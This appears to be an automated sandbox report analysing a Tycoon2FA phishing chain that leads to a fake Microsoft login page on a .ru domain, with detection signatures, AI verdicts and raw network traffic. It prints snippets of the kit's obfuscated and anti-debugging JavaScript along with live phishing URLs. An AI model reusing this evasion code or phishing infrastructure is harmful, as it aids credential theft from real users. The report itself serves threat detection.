Edit tour

Windows Analysis Report
https://www.google.com/url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&sa=D&sntz=1&usg=AOvVaw3ATSMSB0528phcgCi4pOKj&af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwKEGO6dPY7Z5PPVc3m4uU~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5R

Overview

General Information

Sample URL:https://www.google.com/url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&sa=D&sntz=1&usg=AOvVaw3ATSMSB0528phcgCi4pOKj&af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwK
Analysis ID:1648740
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,727462187047883651,15447064397842192856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&sa=D&sntz=1&usg=AOvVaw3ATSMSB0528phcgCi4pOKj&af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwKEGO6dPY7Z5PPVc3m4uU~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POr" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_111JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    SourceRuleDescriptionAuthorStrings
    2.16.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      2.16.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
        2.17.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          2.20.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            2.21..script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 16 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'ed47.eqgegucq.ru' does not match the legitimate domain for Microsoft., The URL uses a '.ru' domain extension, which is unusual for Microsoft and could indicate a phishing attempt., The URL contains random characters and does not resemble any known Microsoft subdomains or services., The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts. DOM: 3.12.pages.csv
              Source: Yara matchFile source: 3.12.pages.csv, type: HTML
              Source: Yara matchFile source: 3.13.pages.csv, type: HTML
              Source: Yara matchFile source: 2.17.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.10.pages.csv, type: HTML
              Source: Yara matchFile source: 2.17.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.21..script.csv, type: HTML
              Source: Yara matchFile source: 2.10.pages.csv, type: HTML
              Source: Yara matchFile source: 3.35..script.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_111, type: DROPPED
              Source: Yara matchFile source: 3.32.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.16.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.20.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.25.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.27..script.csv, type: HTML
              Source: Yara matchFile source: 3.28..script.csv, type: HTML
              Source: Yara matchFile source: 3.12.pages.csv, type: HTML
              Source: Yara matchFile source: 3.13.pages.csv, type: HTML
              Source: 2.21..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ed47.eqgegucq.ru/SaqM/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: 2.18..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ed47.eqgegucq.ru/SaqM/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to execute malicious code on the user's device, which poses a significant security risk. Additionally, the script is interacting with an untrusted domain, further increasing the likelihood of malicious intent. Overall, this script should be considered a high-risk threat and should be blocked or removed from the website immediately.
              Source: 3.27..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwe... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It attempts to detect and block common security tools, intercepts keyboard and context menu events, and redirects the user to an external website. These behaviors are highly suspicious and indicate a potentially malicious intent.
              Source: 3.28..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwe... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It checks for the presence of browser automation tools, blocks common keyboard shortcuts, and redirects the user to an external website after a delay. These behaviors are highly suspicious and indicate a potentially malicious intent.
              Source: 2.24..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ed47.eqgegucq.ru/SaqM/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code, the presence of anti-debugging techniques, and the overall malicious intent make this a high-risk script.
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: Number of links: 0
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://ed47.eqgegucq.ru/SaqM/HTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function cEoNSTKQhG(event) { co...
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: Title: Sign In To Secure System does not match URL
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: Invalid link: Terms of use
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: Invalid link: Privacy & cookies
              Source: https://ed47.eqgegucq.ru/SaqM/HTTP Parser: function yjegimcrvt(){jbshleopgy = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+ug9ydgzvbglvicygqwdlbmn5ic0gtw9kzxjuierlc2lnbjwvdgl0bgu+ciagpgxpbmsgahjlzj0iahr0chm6ly9mb250cy5nb29nbgvhcglzlmnvbs9jc3myp2zhbwlset1nb250c2vycmf0ondnahrandawozcwmczmyw1pbhk9um9ib3rvondnahramzawozqwmds1mdamzglzcgxhet1zd2fwiibyzww9inn0ewxlc2hlzxqipgogidxzdhlszt4kicagic8qiedlbmvyywwgu3r5bgvzicovciagicbib2r5ihskicagicagzm9udc1myw1pbhk6icdsb2jvdg8nlcbzyw5zlxnlcmlmowogicagicbtyxjnaw46ida7ciagicagihbhzgrpbmc6ida7ciagicagignvbg9yoiajmzmzowogicagicbsaw5llwhlawdoddogms42owogicagicbiywnrz3jvdw5klwnvbg9yoiajzjrmngy5owogicagfqokicagiggxlcbomiwgadmgewogicagicbmb250lwzhbwlsetogj01vbnrzzxjyyxqnlcbzyw5zlxnlcmlmowogicagicbjb2xvcjogizjjm2u1mdskicagih0kciagicbhihskicagicagy29sb3i6icmzndk4zgi7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagih0kciagicbhomhvdmvyihskicagicagdgv4dc1kzwnvcmf0aw9uoib1bmrlc...
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "g3lvs";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/ngy9o25negd0s2dtu5044y8ilfjmh8xic0d7bifesr351hui6h32";var gdf = "/ghr3zfvcnnx2beydn0ognpaevhwxvdpnjcmquydlybab120";var odf = "/ijyq1j0igdrbblyubymsfdkzwyzxzp8lkwl60pjdayebjcd650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match(/edg/i)...
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: <input type="password" .../> found
              Source: https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrHTTP Parser: No favicon
              Source: https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrHTTP Parser: No favicon
              Source: https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrHTTP Parser: No favicon
              Source: https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrHTTP Parser: No favicon
              Source: https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrHTTP Parser: No favicon
              Source: https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrHTTP Parser: No favicon
              Source: https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrHTTP Parser: No favicon
              Source: https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrHTTP Parser: No favicon
              Source: https://ed47.eqgegucq.ru/SaqM/HTTP Parser: No favicon
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: No favicon
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: No <meta name="author".. found
              Source: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUHTTP Parser: No <meta name="copyright".. found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownHTTPS traffic detected: 172.217.165.132:443 -> 192.168.2.16:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.0.235.11:443 -> 192.168.2.16:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.0.235.11:443 -> 192.168.2.16:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.64.100:443 -> 192.168.2.16:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.65.196:443 -> 192.168.2.16:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.64.100:443 -> 192.168.2.16:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.219.43:443 -> 192.168.2.16:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.220:443 -> 192.168.2.16:49763 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.16:49781 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49782 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.16:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49827 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 12MB later: 40MB
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&sa=D&sntz=1&usg=AOvVaw3ATSMSB0528phcgCi4pOKj&af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwKEGO6dPY7Z5PPVc3m4uU~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sector HTTP/1.1Host: essaystoolkit.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.google.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sector/ HTTP/1.1Host: essaystoolkit.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.google.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://essaystoolkit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil&co=aHR0cHM6Ly9lc3NheXN0b29sa2l0LmNvbTo0NDM.&hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&size=normal&cb=2rirk35zck5i HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://essaystoolkit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI HTTP/1.1Host: www.google.comConnection: keep-aliveAccept: */*X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil&co=aHR0cHM6Ly9lc3NheXN0b29sa2l0LmNvbTo0NDM.&hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&size=normal&cb=2rirk35zck5iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://essaystoolkit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: essaystoolkit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://essaystoolkit.com/sector/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
